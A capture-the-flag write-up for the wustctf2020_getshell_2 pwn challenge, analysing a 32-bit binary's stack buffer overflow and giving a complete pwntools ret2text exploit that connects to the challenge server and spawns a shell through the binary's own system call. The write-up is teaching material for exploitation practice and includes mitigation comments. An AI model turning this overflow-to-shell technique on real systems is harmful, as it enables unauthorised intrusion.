wustctf2020 getshell 2
# wustctf2020 getshell 2
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/wustctf2020_getshell_2/wustctf2020_getshell_2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
// Decompiler output. init() is not listed on this page, so what it sets up
// (stream buffering, a banner, ...) cannot be stated here.
init();
// All user input is consumed inside vulnerable(); see its listing below.
vulnerable();
return 0;
}
vulnerable函数如下:
ssize_t vulnerable()
{
// Decompiler output: `buf` sits at ebp-0x18, i.e. only 0x18 (24) bytes lie
// between it and the saved ebp / return address.
char buf; // [esp+0h] [ebp-18h]
// read() accepts up to 0x24 (36) bytes with no bound tied to the buffer, so
// the 12 bytes past `buf` (saved ebp, return address and one further stack
// slot) are caller-controlled: a stack-based buffer overflow, and there is no
// canary to catch it (see the checksec output above).
// Mitigation: declare `buf` with an explicit size and read at most
// sizeof(buf) bytes; a stack canary and PIE would raise the bar further.
return read(0, &buf, 0x24u);
}
shell函数如下:
int shell()
{
// Decompiler output. Because this helper exists, system() is linked into the
// binary and, with PIE off, the `call system` site has a fixed address.
// The literal as a whole presumably does not name a real program, but its
// tail "/sh" (reported at 0x08048670 by the ROPgadget search below) is a
// usable command string on its own - this is why the write-up treats the
// binary as a ret2text target. Defender's note: a deliberately broken shell
// helper still leaves system() and a shell string in the image; remove it
// rather than obfuscate it.
return system("/bbbbbbbbin_what_the_f?ck__--??/sh");
}
Gadget:
ROPgadget --binary wustctf2020_getshell_2 --string "/sh\x00"
Strings information
============================================================
0x08048670 : sh
# 思路分析
目前信息: `vulnerable` 函数存在溢出点，可溢出2个栈帧；`shell` 函数提供了 `system` 与 `sh`。
- No canary found
- NX enabled
- No PIE
思路:
ret2text
# exp
# Exploit script for the BUUCTF challenge wustctf2020_getshell_2 (i386, no PIE,
# no canary). It overflows the 0x18-byte stack buffer in vulnerable() (see the
# static-analysis section) with a ret2text chain: return into the existing
# `call system` inside shell() with the "/sh" string as its argument.
from pwn import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/wustctf2020_getshell_2/wustctf2020_getshell_2'
io = remote('node4.buuoj.cn', 29247)
# io = process(pwnfile)
# 0x18 bytes of buffer plus 4 bytes of saved ebp before the return address
padding = 0x18+4
# address of the `call system` instruction inside shell() (not the PLT stub)
system_addr = 0x8048529
# address of the "/sh" string located with ROPgadget above
sh_addr = 0x8048670
# Only two stack slots can be overflowed past the saved ebp.
# Returning to system@plt would need one more slot for system's own return
# address, which exceeds the 0x24-byte read;
# using the program's existing `call system` instead pushes that return
# address automatically, saving one slot.
payload = flat(['a'*padding, system_addr, sh_addr])
io.recv()
io.sendline(payload)
io.interactive()